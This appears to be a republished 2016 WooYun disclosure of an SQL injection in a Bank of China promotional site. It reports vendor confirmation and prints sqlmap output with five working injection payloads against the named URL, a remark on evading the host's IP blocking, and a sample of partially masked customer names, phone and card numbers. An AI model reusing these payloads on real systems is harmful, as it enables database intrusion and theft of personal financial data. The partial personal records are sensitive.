中行云平台SQL注入涉及北京地区数十万用户身份信息

admin 2017年3月20日03:20:28评论325 views字数 225阅读0分45秒阅读模式
摘要

2016-03-17: 细节已通知厂商并且等待厂商处理中
2016-03-17: 厂商已经确认,细节仅向厂商公开
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-05-01: 细节向公众公开

漏洞概要 关注数(21) 关注此漏洞

缺陷编号: WooYun-2016-185574

漏洞标题: 中行云平台SQL注入涉及北京地区数十万用户身份信息

相关厂商: 中国银行

漏洞作者: 李长歌

提交时间: 2016-03-17 09:26

公开时间: 2016-05-01 19:56

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 第三方不可信程序 php+字符类型注射

3人收藏


漏洞详情

披露状态:

2016-03-17: 细节已通知厂商并且等待厂商处理中
2016-03-17: 厂商已经确认,细节仅向厂商公开
2016-03-27: 细节向核心白帽子及相关领域专家公开
2016-04-06: 细节向普通白帽子公开
2016-04-16: 细节向实习白帽子公开
2016-05-01: 细节向公众公开

简要描述:

中行云平台SQL注入涉及北京地区数十万用户身份信息

详细说明:

某天收到了中行发来了的一个短信,打开链接是一个送流量的广告

中行云平台SQL注入涉及北京地区数十万用户身份信息

打开的网站是

http://boc.weixinhai.net/newnew/index.php/home/index/detail/id/4.html 随便加个单引号报错了

中行云平台SQL注入涉及北京地区数十万用户身份信息

使用的是thinkphp框架,存在注入啊

其后台:

中行云平台SQL注入涉及北京地区数十万用户身份信息

但是这个系统是放在了阿里云上,直接注入阿里云会封IP,三两分钟网站就打不开了。

中行云平台SQL注入涉及北京地区数十万用户身份信息

不过可以绕过:

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: http://boc.weixinhai.net:80/newnew/index.php/home/index/detail/id/4) OR NOT 5157=5157#.html

Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: http://boc.weixinhai.net:80/newnew/index.php/home/index/detail/id/-5873) OR 1 GROUP BY CONCAT(0x716b6b6a(RAND(0)*2)) HAVING MIN(0)#.html

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://boc.weixinhai.net:80/newnew/index.php/home/index/detail/id/4);(SELECT * FROM (SELECT(SLEEP(5)))sX

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SELECT - comment)
Payload: http://boc.weixinhai.net:80/newnew/index.php/home/index/detail/id/4) OR (SELECT * FROM (SELECT(SLEEP(5))

Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: http://boc.weixinhai.net:80/newnew/index.php/home/index/detail/id/4) UNION ALL SELECT NULL,NULL,NULL,NUL476c507259796e75796b574f50495673,0x717a786b71)#.html
---

看下数据库里的信息还是不少的。

中行云平台SQL注入涉及北京地区数十万用户身份信息

其中boc_referee_data 是银行卡信息 boc_bank_user 是用户的身份信息 一共有六七十万吧,基本都是北京市的用户。

数据库未作任何拷贝,贴部分数据吧,管理帮打下mask

code 区域

mask 区域
*****8ecf8427e,<blank>,1,1501074*****
*****8427e,<blank>,1,18718867230,0*****
*****8427e,<blank>,1,18811702980,0*****
*****cf8427e,<blank>,1,1501148723*****

1,王卫星,3776*******0007
2,董宪章,3776*******0866
3,董立操,3776*******4033
4,董芮宁,3776*******4033
5,马立,3776*******7168
6,张怡,3776*******0618
7,朱锦,3776*******2499
8,焦旭东,3776*******2910
9,张苏江,3776*******3305
10,平三一,3776*******1415
11,张会联,3776*******4609
12,陈健华,3776*******4376
13,王小琳,3776*******8617
14,王晴,3776*******9235
15,孙娣,3776*******6792
16,王玉苓,3776*******8103
17,谭志慧,3776*******8368
18,刘丽,3776*******9853
19,金春芽,3776*******0935
20,赵娜,3776*******4515
21,于迪,3776*******8888
22,焦莉莉,3776*******0983
23,李斌,3776*******5040
24,汪洋,3776*******8001
25,王霁虹,3776*******3769
26,陈玉华,3776*******4501
27,任哲,3776*******0482
28,郭慧玲,3776*******1753
29,任智,3776*******6240
30,兰民国,3776*******1059
31,王镇,3776*******5795
32,王洪刚,3776*******5679
33,吴跃煌,3776*******8228
34,麻赛鹉,3776*******5447
35,鲁元凤,3776*******8185
36,赵敏娟,3776*******8888
37,武威,3776*******3425
38,王辉,3776*******4837
39,刘东生,3776*******8515
40,于金源,3776*******2111
41,郝欣欣,3776*******1922
42,檀艳丽,3776*******4868
43,肖健,3776*******5915
44,郑国玉,3776*******8505

漏洞证明:

见详细

修复方案:

修复注入

版权声明:转载请注明来源 李长歌@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-17 19:56

厂商回复:

已处置。

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2016-03-17 11:32 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

    1

    进来才知道是中国银行的.....最近发生了啥这么多洞

  2. 2016-05-05 17:06 | 泡泡堂 ( 普通白帽子 | Rank:865 漏洞数:216 | 学习,学习。。。)

    0

    mark

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin